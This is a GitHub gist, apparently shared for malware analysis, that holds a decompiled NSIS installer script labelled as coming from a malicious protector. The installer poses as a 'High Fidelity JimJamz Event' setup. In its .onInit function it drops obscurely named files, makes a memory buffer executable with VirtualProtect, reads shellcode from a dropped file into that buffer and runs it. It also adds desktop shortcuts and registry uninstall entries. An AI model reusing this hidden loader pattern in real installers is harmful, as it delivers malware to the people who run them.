-
-
Save hshrzd/1c3e9a5cb168065d3e93c7f3d877a9b8 to your computer and use it in GitHub Desktop.
A script from the malicious NSIS protector
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; NSIS script NSIS-2 | |
| ; Install | |
| SetCompressor /SOLID lzma | |
| SetCompressorDictSize 8 | |
| ; -------------------- | |
| ; HEADER SIZE: 12293 | |
| ; START HEADER SIZE: 300 | |
| ; MAX STRING LENGTH: 1024 | |
| ; STRING CHARS: 3479 | |
| OutFile [NSIS].exe | |
| !include WinMessages.nsh | |
| ; -------------------- | |
| ; LANG TABLES: 1 | |
| ; LANG STRINGS: 47 | |
| Name "Dravidian Unclassified" | |
| BrandingText "Nullsoft Install System v2.46" | |
| ; LANG: 1033 | |
| LangString LSTR_0 1033 "Nullsoft Install System v2.46" | |
| LangString LSTR_1 1033 "$(LSTR_2) Setup" | |
| LangString LSTR_2 1033 "Dravidian Unclassified" | |
| LangString LSTR_5 1033 "Can't write: " | |
| LangString LSTR_6 1033 "Copy failed" | |
| LangString LSTR_7 1033 "Copy to " | |
| LangString LSTR_8 1033 "Could not find symbol: " | |
| LangString LSTR_9 1033 "Could not load: " | |
| LangString LSTR_10 1033 "Create folder: " | |
| LangString LSTR_11 1033 "Create shortcut: " | |
| LangString LSTR_12 1033 "Created uninstaller: " | |
| LangString LSTR_13 1033 "Delete file: " | |
| LangString LSTR_14 1033 "Delete on reboot: " | |
| LangString LSTR_15 1033 "Error creating shortcut: " | |
| LangString LSTR_16 1033 "Error creating: " | |
| LangString LSTR_17 1033 "Error decompressing data! Corrupted installer?" | |
| LangString LSTR_20 1033 "Execute: " | |
| LangString LSTR_21 1033 "Extract: " | |
| LangString LSTR_22 1033 "Extract: error writing to file " | |
| LangString LSTR_23 1033 "Installer corrupted: invalid opcode" | |
| LangString LSTR_24 1033 "No OLE for: " | |
| LangString LSTR_25 1033 "Output folder: " | |
| LangString LSTR_26 1033 "Remove folder: " | |
| LangString LSTR_29 1033 "Skipped: " | |
| LangString LSTR_30 1033 "Copy Details To Clipboard" | |
| LangString LSTR_36 1033 "Error opening file for writing: $\r$\n$\r$\n$0$\r$\n$\r$\nClick Abort to stop the installation,$\r$\nRetry to try again, or$\r$\nIgnore to skip this file." | |
| LangString LSTR_37 1033 Custom | |
| LangString LSTR_38 1033 Cancel | |
| LangString LSTR_39 1033 ": Installing" | |
| LangString LSTR_40 1033 "Show &details" | |
| LangString LSTR_41 1033 Completed | |
| LangString LSTR_42 1033 "< &Back" | |
| LangString LSTR_43 1033 "&Next >" | |
| LangString LSTR_44 1033 "Click Next to continue." | |
| LangString LSTR_45 1033 ": Completed" | |
| LangString LSTR_46 1033 &Close | |
| ; -------------------- | |
| ; VARIABLES: 26 | |
| Var _0_ | |
| Var _1_ | |
| Var _2_ | |
| Var _3_ | |
| Var _4_ | |
| Var _5_ | |
| Var _6_ | |
| Var _7_ | |
| Var _8_ | |
| Var _9_ | |
| Var _10_ | |
| Var _11_ | |
| Var _12_ | |
| Var _13_ | |
| Var _14_ | |
| Var _15_ | |
| Var _16_ | |
| Var _17_ | |
| Var _18_ | |
| Var _19_ | |
| Var _20_ | |
| Var _21_ | |
| Var _22_ | |
| Var _23_ | |
| Var _24_ | |
| Var _25_ | |
| InstType $(LSTR_37) ; Custom | |
| InstallDir $TEMP | |
| ; wininit = $WINDIR\wininit.ini | |
| ; -------------------- | |
| ; PAGES: 2 | |
| ; Page 0 | |
| Page instfiles | |
| CompletedText $(LSTR_41) ; Completed | |
| DetailsButtonText $(LSTR_40) ; "Show &details" | |
| /* | |
| ; Page 1 | |
| Page COMPLETED | |
| */ | |
| ; -------------------- | |
| ; SECTIONS: 1 | |
| ; COMMANDS: 255 | |
| Function func_0 | |
| Exch $R2 | |
| ; Push $R2 | |
| ; Exch | |
| ; Pop $R2 | |
| Exch | |
| Exch $R1 | |
| ; Push $R1 | |
| ; Exch | |
| ; Pop $R1 | |
| Exch 2 | |
| Exch $R0 | |
| ; Push $R0 | |
| ; Exch | |
| ; Pop $R0 | |
| Push $R3 | |
| Push $R4 | |
| Push $R5 | |
| Push $R6 | |
| Push $R7 | |
| Push $R8 | |
| Push $R9 | |
| StrCpy $R3 0 | |
| StrLen $R4 $R1 | |
| StrLen $R6 $R0 | |
| StrLen $R9 $R2 | |
| label_22: | |
| StrCpy $R5 $R0 $R4 $R3 | |
| StrCmp $R5 $R1 label_27 | |
| StrCmp $R3 $R6 label_34 | |
| IntOp $R3 $R3 + 1 | |
| Goto label_22 | |
| label_27: | |
| StrCpy $R5 $R0 $R3 | |
| IntOp $R8 $R3 + $R4 | |
| StrCpy $R7 $R0 "" $R8 | |
| StrCpy $R0 $R5$R2$R7 | |
| StrLen $R6 $R0 | |
| IntOp $R3 $R3 + $R9 | |
| Goto label_22 | |
| label_34: | |
| Pop $R9 | |
| Pop $R8 | |
| Pop $R7 | |
| Pop $R6 | |
| Pop $R5 | |
| Pop $R4 | |
| Pop $R3 | |
| Push $R0 | |
| Push $R1 | |
| Pop $R0 | |
| Pop $R1 | |
| Pop $R0 | |
| Pop $R2 | |
| Exch $R1 | |
| ; Push $R1 | |
| ; Exch | |
| ; Pop $R1 | |
| FunctionEnd | |
| Function func_51 | |
| Exch $_1_ | |
| ; Push $_1_ | |
| ; Exch | |
| ; Pop $_1_ | |
| Exch | |
| Exch $_0_ | |
| ; Push $_0_ | |
| ; Exch | |
| ; Pop $_0_ | |
| StrCpy $_6_ "" | |
| StrCpy $_2_ -1 | |
| StrLen $_3_ $_1_ | |
| StrLen $_5_ $_0_ | |
| label_62: | |
| IntOp $_2_ $_2_ + 1 | |
| StrCpy $_4_ $_0_ $_3_ $_2_ | |
| StrCmp $_4_ $_1_ label_67 | |
| StrCmp $_2_ $_5_ label_69 | |
| Goto label_62 | |
| label_67: | |
| StrCpy $_6_ $_1_ | |
| Goto label_69 | |
| label_69: | |
| Pop $_1_ | |
| Exch $_6_ | |
| ; Push $_6_ | |
| ; Exch | |
| ; Pop $_6_ | |
| FunctionEnd | |
| Section LightInstaller ; Section_0 | |
| Call func_171 | |
| StrCmp false true 0 label_77 | |
| Call func_180 | |
| label_77: | |
| Call func_215 | |
| Call func_228 | |
| SectionEnd | |
| Function func_80 | |
| StrCpy $_7_ false | |
| StrCpy $_8_ false | |
| FunctionEnd | |
| Function func_83 | |
| WriteUninstaller "$APPDATA\High Fidelity\JimJamz\Uninstall High Fidelity JimJamz Event.exe" ; "$INSTDIR\$APPDATA\High Fidelity\JimJamz\Uninstall High Fidelity JimJamz Event.exe" | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" DisplayName "High Fidelity JimJamz Event" | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" UninstallString "$\"$APPDATA\High Fidelity\JimJamz\Uninstall High Fidelity JimJamz Event.exe$\"" | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" DisplayIcon "$\"$APPDATA\High Fidelity\JimJamz\High Fidelity JimJamz Event.exe$\"" | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" Publisher "High Fidelity, Inc" | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" HelpLink http://highfidelity.com | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" URLUpdateInfo http://highfidelity.com | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" URLInfoAbout http://highfidelity.com | |
| WriteRegStr HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" DisplayVersion 1.0.0 | |
| WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" VersionMajor 1 | |
| WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" VersionMinor 0 | |
| WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" NoModify 1 | |
| WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" NoRepair 1 | |
| WriteRegDWORD HKLM "Software\Microsoft\Windows\CurrentVersion\Uninstall\High Fidelity, Inc High Fidelity JimJamz Event" EstimatedSize 1024 | |
| FunctionEnd | |
| Function .onInit | |
| InitPluginsDir | |
| ; Call Initialize_____Plugins | |
| ; SetDetailsPrint lastused | |
| SetOutPath $INSTDIR | |
| File 5e9ikl8w3iif7ipp6 | |
| File 3ugs67ip868x5n | |
| File tjdorfrldbgdlq | |
| System::Alloc 1024 | |
| ; Call Initialize_____Plugins | |
| ; SetOverwrite off | |
| ; File $PLUGINSDIR\System.dll | |
| ; SetDetailsPrint lastused | |
| ; Push 1024 | |
| ; CallInstDLL $PLUGINSDIR\System.dll Alloc | |
| Pop $0 | |
| System::Call "kernel32::CreateFile(t'$INSTDIR\tjdorfrldbgdlq', i 0x80000000, i 0, p 0, i 3, i 0, i 0)i.r10" | |
| ; Call Initialize_____Plugins | |
| ; File $PLUGINSDIR\System.dll | |
| ; SetDetailsPrint lastused | |
| ; Push "kernel32::CreateFile(t'$INSTDIR\tjdorfrldbgdlq', i 0x80000000, i 0, p 0, i 3, i 0, i 0)i.r10" | |
| ; CallInstDLL $PLUGINSDIR\System.dll Call | |
| System::Call "kernel32::VirtualProtect(i r0, i 1024, i 0x40, p0)p.r1" | |
| ; Call Initialize_____Plugins | |
| ; AllowSkipFiles off | |
| ; File $PLUGINSDIR\System.dll | |
| ; SetDetailsPrint lastused | |
| ; Push "kernel32::VirtualProtect(i r0, i 1024, i 0x40, p0)p.r1" | |
| ; CallInstDLL $PLUGINSDIR\System.dll Call | |
| System::Call "kernel32::ReadFile(i r10, i r0, i 1024, t., i 0) i .r3" | |
| ; Call Initialize_____Plugins | |
| ; File $PLUGINSDIR\System.dll | |
| ; SetDetailsPrint lastused | |
| ; Push "kernel32::ReadFile(i r10, i r0, i 1024, t., i 0) i .r3" | |
| ; CallInstDLL $PLUGINSDIR\System.dll Call | |
| System::Call ::$0() | |
| ; Call Initialize_____Plugins | |
| ; File $PLUGINSDIR\System.dll | |
| ; SetDetailsPrint lastused | |
| ; Push ::$0() | |
| ; CallInstDLL $PLUGINSDIR\System.dll Call | |
| Call func_80 | |
| CreateDirectory "$APPDATA\High Fidelity\JimJamz" | |
| CopyFiles $EXEPATH "$APPDATA\High Fidelity\JimJamz\High Fidelity JimJamz Event.exe" ; "$(LSTR_7)$APPDATA\High Fidelity\JimJamz\High Fidelity JimJamz Event.exe" ; "Copy to " | |
| CreateShortCut "$DESKTOP\High Fidelity JimJamz Event.lnk" "$APPDATA\High Fidelity\JimJamz\High Fidelity JimJamz Event.exe" | |
| CreateDirectory "$SMPROGRAMS\High Fidelity JimJamz Event" | |
| CreateShortCut "$SMPROGRAMS\High Fidelity JimJamz Event\High Fidelity JimJamz Event.lnk" "$APPDATA\High Fidelity\JimJamz\High Fidelity JimJamz Event.exe" "" "$APPDATA\High Fidelity\JimJamz\High Fidelity JimJamz Event.exe" | |
| Call func_83 | |
| Return | |
| FunctionEnd | |
| Function func_139 | |
| ReadRegStr $_9_ HKCR hifi\DefaultIcon "" | |
| Push $_9_ | |
| Push ,1 | |
| Push "" | |
| Call func_0 | |
| Pop $_9_ | |
| FunctionEnd | |
| Function func_146 | |
| Call func_139 | |
| StrCmp $_9_ "" label_169 | |
| IfFileExists $_9_ label_149 label_169 | |
| label_149: | |
| StrCpy $R0 139 | |
| ExecWait "$\"$_9_$\" --suppress-settings-reset --protocolVersion $TEMP\version.txt" | |
| FileOpen $_11_ $TEMP\version.txt r | |
| FileRead $_11_ $_10_ | |
| FileClose $_11_ | |
| StrCmp $_10_ vNTlzyZbPVfAprVzet07vA== 0 label_157 | |
| StrCpy $_8_ true | |
| Goto label_167 | |
| label_157: | |
| Push $_9_ | |
| Push steamapps | |
| Call func_51 | |
| Pop $_14_ | |
| StrCmp $_14_ "" label_163 | |
| Goto label_164 | |
| label_163: | |
| Goto label_169 | |
| label_164: | |
| MessageBox MB_RETRYCANCEL|MB_ICONEXCLAMATION "You have an old version of High Fidelity installed through Steam.$\r$\nPlease update High Fidelity through Steam, then press Retry.$\r$\nTo quit this installer, press Cancel.$\r$\n$\r$\nNOTE: During debugging, while the Steam version of HiFi is out-of-date, you will get stuck here, as no version of HiFi is up-to-date enough to work with this installer." /SD IDCANCEL IDRETRY label_167 IDCANCEL 0 | |
| Quit | |
| Call func_146 | |
| label_167: | |
| Delete $TEMP\version.txt | |
| Goto label_170 | |
| label_169: | |
| StrCpy $_7_ true | |
| label_170: | |
| FunctionEnd | |
| Function func_171 | |
| Call func_146 | |
| StrCmp $_7_ true 0 label_179 | |
| StrCpy $_13_ hifi_installer.exe | |
| StrCpy $_12_ $TEMP\$_13_ | |
| Pop $R0 | |
| StrCmp $R0 OK label_180 | |
| MessageBox MB_OK "High Fidelity Interface download failed with status: $R0. Please try running this installer again." | |
| Quit | |
| label_179: | |
| FunctionEnd | |
| Function func_180 | |
| label_180: | |
| IfFileExists "$APPDATA\High Fidelity\content-sets\jimjamz-1" label_181 label_182 | |
| label_181: | |
| Goto label_192 | |
| label_182: | |
| StrCpy $_15_ hifi_content.zip | |
| StrCpy $_16_ $TEMP\$_15_ | |
| Pop $R0 | |
| StrCmp $R0 OK label_189 | |
| MessageBox MB_OK "Content download failed with status: $R0. Please try running this installer again." | |
| Quit | |
| Pop $R0 | |
| label_189: | |
| StrCmp $R0 success label_192 | |
| MessageBox MB_OK "Content set decompression failed with status: $R0. Please try running this installer again." | |
| Goto label_192 | |
| label_192: | |
| Return | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Invalid | |
| Function func_215 | |
| StrCmp $_7_ true 0 label_227 | |
| Exec "$\"$_12_$\" /nSandboxIfNew /S /forceNoLaunchClient /forceNoLaunchServer" | |
| StrCpy $_24_ 1 | |
| StrCpy $_23_ hifi$_24_.bmp | |
| Pop $_18_ | |
| StrCmp $_18_ error 0 label_222 | |
| Abort | |
| label_222: | |
| Pop $_19_ | |
| Pop $_20_ | |
| SendMessage $_20_ 0x040a 1 50 | |
| Pop $_21_ | |
| EnableWindow $$mui.Button.Cancel 1 | |
| label_227: | |
| FunctionEnd | |
| Function func_228 | |
| Push $CMDLINE | |
| Push /forceNoLaunchClient | |
| Call func_51 | |
| Pop $_14_ | |
| StrCmp $_8_ true 0 label_238 | |
| StrCmp $_14_ "" 0 label_238 | |
| Call func_139 | |
| StrCpy $_25_ "--url $\"hifi://JimJamz$\" --suppress-settings-reset --skipTutorial" | |
| IfFileExists $APPDATA\..\LocalLow\Morph3D\ReadyRoom\High_Fidelity_RR_Launch.js label_237 label_237 | |
| label_237: | |
| Exec "$\"$_9_$\" $_25_" | |
| label_238: | |
| SendMessage $HWNDPARENT 0x0111 2 0 | |
| Quit | |
| FunctionEnd | |
| /* | |
| Function Initialize_____Plugins | |
| SetDetailsPrint none | |
| StrCmp $PLUGINSDIR "" 0 label_251 | |
| Push $0 | |
| SetErrors | |
| GetTempFileName $0 | |
| Delete $0 | |
| CreateDirectory $0 | |
| IfErrors label_252 | |
| StrCpy $PLUGINSDIR $0 | |
| Pop $0 | |
| label_251: | |
| Return | |
| label_252: | |
| MessageBox MB_OK|MB_ICONSTOP "Error! Can't initialize plug-ins directory. Please try again later." /SD IDOK | |
| Quit | |
| FunctionEnd | |
| */ | |
| ; -------------------- | |
| ; UNREFERENCED STRINGS: | |
| /* | |
| 1 ProgramFilesDir | |
| 17 "C:\Program Files" | |
| 34 $PROGRAMFILES | |
| 38 CommonFilesDir | |
| 53 "$PROGRAMFILES\Common Files" | |
| 70 $COMMONFILES | |
| 2195 $_17_ | |
| 2203 "High Fidelity failed to install. Please rerun this installer." | |
| 2265 $_19_ | |
| 2269 0x000C | |
| 2280 100 | |
| 2284 0x0402 | |
| 2291 $${PBST_ERROR} | |
| 2305 $${PBM_SETSTATE} | |
| 2321 "High Fidelity has finished installing!" | |
| 2364 Finish | |
| 2371 $_24_ | |
| */ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment